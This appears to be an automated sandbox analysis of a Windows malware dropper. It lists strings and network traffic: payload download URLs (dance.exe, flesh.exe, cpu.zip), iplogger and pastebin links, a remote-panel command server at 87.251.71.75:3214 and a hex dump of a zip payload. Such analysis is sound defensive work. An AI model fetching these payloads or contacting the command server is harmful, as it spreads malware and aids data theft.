                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Feb 2021 08:11:30 GMTContent-Type: application/zipContent-Length: 6296834Connection: keep-aliveKeep-Alive: timeout=60Last-Modified: Sat, 20 Feb 2021 21:11:22 GMTETag: "601502-5bbcb02b93280"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 01 7a 3a 52 67 77 19 1f bf 02 00 00 e3 08 00 00 0b 00 00 00 63 6f 6e 66 69 67 2e 6a 73 6f 6e ad 56 c9 6e db 30 10 bd e7 2b 02 9d 43 d7 76 e1 16 e8 2d 40 72 4b 51 20 69 51 14 45 61 8c a9 b1 c4 9a e2 b0 43 ca 4b 8b fc 7b 49 79 89 44 d3 45 0e 95 01 43 9a c7 19 3d 3e ce a2 3f 57 d7 e1 2a c0 aa e2 c3 f5 fe a1 33 a8 32 3c 9b 56 eb 9b 17 db 86 78 85 2c 4e 50 87 3c ef 17 14 b5 f7 76 18 02 0d 2c 34 c6 c5 4b d0 0e 7b 81 6a 72 3e 98 8b c9 f4 fd 68 1c 7e 93 a2 07 5a e2 08 8e 7b 26 90 12 9d 13 9e 56 68 ce 69 31 3a cf 4a fa ee 55 9e 5b 1c f0 82 d6 93 83 35 1e b0 83 75 01 72 55 31 b5 26 a1 57 48 d2 c4 6e bf f8 68 f3 ca eb c4 9f c1 94 d4 6c 13 cd 8c 8a cc c5 e4 66 68 13 b0 de 4e 53 a0 a1 32 c6 ec f8 f5 b7 3f a9 16 c2 42 85 2e a3 1b 97 8d e3 01 91 ce bc e1 ac 59 82 ac 71 fe 8b 72 91 4c db c0 b9 87 93 0c 5e d6 16 ca b9 65 5c 62 b8 9f 1f 78 4e 06 a2 4a db 5e 3a eb 24 64 dd 56 78 da cf 45 4c fc 54 3e 97 27 1b 01 e8 ce 4f dc b2 22 56 7e 77 8e 34 d8 10 ef 84 25 d2 99 78 3b 85 3a c3 b1 81 ad f0 35 23 94 4e d4 ca 44 26 93 f1 20 ff 5c 73 ee 05 5c 91 99 0a d5 58 9d f0 e8 3c 3c d3 62 e3 45 8c ed d4 ef 28 e1 6c d6 8f 29 cd 9b 71 86 a2 34 42 2b 8f 59 6c 05 1b 4b 9b 23 30 38 10 b2 68 a4 7e 6d fd 75 99 71 be 23 4d 50 22 67 e4 d6 e0 97 c4 51 83 e2 f6 e3 5d 3f 5b a1 d4 99 c4 fb c7 d6 fa 5b 1b a6 54 5b c2 6b f9 5f 22 6a d6 cd ff a2 53 92 01 8f 42 e3 1a 63 c8 c9 d0 4c eb d0 07 2d d3 76 d7 c3 34 55 62 a9 34 0e 78 15 31 15 63 0a 7f 3f bd f9 65 8b dd 02 d0 15 ed 5d 0e 2e 2f 0c 49 99 3c d2 72 24 75 60 33 5a 4f 47 db 86 55 35 92 d4 7c 78 1b ae 22 5d ee 3a b5 8a 6f 9f be 3c ce bf de 3e 3c dc 7f 9e df de dd 3d de 3f 3d a5 4b 2d b8 c8 b6 d8 a6 40 88 2f 4e 9d 3f c1 8c 92 58 83 ab 8f 4a 26 f0 0a d1 82 56 6b bc 80 5f 6a 1e 1d e8 3b f5 96 19 b7 80 04 bd 4d 85 6c 79 5f b5 19 6a 25 84 8e 60 2e 44 70 24 57 6e 96 77 74 a8 97 22 fc a1 f4 fd 71 17 af e7 ee ee c7 f1 80 e3 cb 85 57 4d dc de bb 43 89 17 35 82 f6 b5 c8 83 65 a3 92 71 82 61 82 75 9d 6e d6 b3 84 3e 06 e1 e8 7a 56 b7 73 21 cb 92 91 e5 b5 7b 6d e1 84 94 f5 24 f7 09 99 d4 8e 44 f6 79 eb 7c 85 99 4e 2b 95 ad 91 dd 45 a0 0d b5 95 41 cb 30 5d 18 9a dc 17 44 cc 52 11 a6 41 72 94 45 a8 b5 05 75 32 1c f5 db c4 29 35 54 b0 53 4a 90 11 0b f0 1e 79 77 2a ea e7 ab bf 50 4b 03 04 14 00 00 00 08 00 54 22 55 52 75 cb 47 e4 24 f1 5f 00 a8 20 69 00 07 00 00 00 63 70 75 2e 65 78 65 ec 5a 67 38 9c c1 16 5e bd f7 1e ac 2e da 25 11 2d 08 bb ca ea bd 5b 96 d5 3b 57 09 82 20 08 a2 13 bd 44 59 9d e8 65 b5 25 88 84 10 82 88 16 36 ba 10 5c d1 89 bb dc de ef cf fb e3 ce b3 fb 9c ef 9b 79 e7 cc 99 73 e6 9d 6f bf 39 ab 65 9e 0c c0 01 00 00 b8 98 ef f5 35 00 d0 0e f8 43 01 01 fe 73 b9 87 05 00 90 b3 75 90 03 9a 89 46 39 da b1 34 47 39 0c 9d 9c 7d d8 bd bc 3d 1d b
                  Source: global trafficHTTP traffic detected: GET /cpu.zip HTTP/1.1Host: 195.2.84.91Connection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: iplogger.org
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: 87.251.71.75:3214Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpString found in binary or memory: http://195.2.84.91/amd.zip
                  Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpString found in binary or memory: http://195.2.84.91/cpu.zip
                  Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpString found in binary or memory: http://195.2.84.91/nvidia.zip
                  Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmpString found in binary or memory: http://87.251.71.75:
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://87.251.71.75:3214
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://87.251.71.75:3214/
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: http://87.251.71.75:32144
                  Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmpString found in binary or memory: http://87.251.71.75:3214t
                  Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                  Source: nulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpString found in binary or memory: http://bitbucket.org
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmpString found in binary or memory: http://blog.agencia10x.com
                  Source: nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://bot.whatismyipaddress.com/
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
                  Source: nulhfhsi.exeString found in binary or memory: http://checkip.dyndns.org
                  Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                  Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0K
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                  Source: evs.exe, evs.exe, 00000016.00000000.419601888.000000000040A000.00000008.00020000.sdmp, evs.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
                  Source: nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmp, evs.exe, 00000016.00000000.419601888.000000000040A000.00000008.00020000.sdmp, evs.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://ocsp.digicert.com0H
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://ocsp.digicert.com0I
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://ocsp.digicert.com0P
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0R
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://ocsp.thawte.com0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://s.symcd.com06
                  Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: http://s3-1-w.amazonaws.com
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enums
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/0
                  Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/Complete
                  Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468811238.0000000003805000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTask
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskResponse
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetSettings
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsResponse
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetTasks
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksResponse
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.471019323.0000000003A19000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfo
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoResponse
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: nulhfhsi.exeString found in binary or memory: http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoip
                  Source: nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpString found in binary or memory: http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchange
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb
                  Source: nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: https://aui-cdn.atlassian.com
                  Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                  Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/e9515cd4-e4be-
                  Source: nulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/flesh.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com/Done.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273251560.0000000003200000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com/dance.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com/mex.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com4
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: 8TD8GfTtaW.exeString found in binary or memory: https://d.symcb.com/cps0%
                  Source: 8TD8GfTtaW.exeString found in binary or memory: https://d.symcb.com/rpa0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: https://d.symcb.com/rpa0.
                  Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabt
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: nulhfhsi.exeString found in binary or memory: https://icanhazip.com
                  Source: nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpString found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
                  Source: nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org
                  Source: powershell.exe, 00000020.00000002.502282965.0000000000B40000.00000004.00000020.sdmpString found in binary or memory: https://iplogger.org/1n6Zw7
                  Source: powershell.exe, 00000020.00000002.507518014.0000000000DD0000.00000004.00000040.sdmpString found in binary or memory: https://iplogger.org/1n6Zw7C:o9P
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.268341781.0000000001392000.00000020.00020000.sdmpString found in binary or memory: https://iplogger.org/1r2et7
                  Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpString found in binary or memory: https://iplogger.org/1tsef7
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/WmBNYXYN
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/bnxCb5RP
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.268341781.0000000001392000.00000020.00020000.sdmpString found in binary or memory: https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN&
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273278567.0000000003208000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com4
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273251560.0000000003200000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                  Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
                  Source: nulhfhsi.exeString found in binary or memory: https://wtfismyip.com/text
                  Source: 8TD8GfTtaW.exeString found in binary or memory: https://www.digicert.com/CPS0
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.67.51:443 -> 192.168.2.5:49723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.217.107.52:443 -> 192.168.2.5:49741 version: TLS 1.2
